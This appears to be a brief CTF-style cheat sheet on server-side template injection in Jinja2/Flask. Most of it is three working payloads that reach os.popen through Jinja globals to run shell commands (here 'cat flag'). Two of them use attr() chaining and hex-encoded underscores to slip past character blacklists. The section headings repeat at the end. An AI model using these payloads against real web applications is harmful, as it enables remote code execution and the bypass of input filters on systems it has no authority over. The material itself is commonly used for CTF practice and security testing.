CSEC Note

Server Side Template Injection

Python Jinja2 (with Flask)

Good Resource

Exploit by calling subprocess.Popen

Python

# Simple version
{{config.__class__.__init__.__globals__['os'].popen('cat flag').read()}}
# Circumvent blacklisted special characters leveraging Jinja's attr(), pipe filtering, and hex encoding of underscores
{{config|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5finit\x5f\x5f')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('os')|attr('popen')('cat flag')|attr('read')()}}
# Another example
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('cat flag')|attr('read')()}}

Server Side Template Injection ​

Python Jinja2 (with Flask) ​

Server Side Template Injection

Python Jinja2 (with Flask)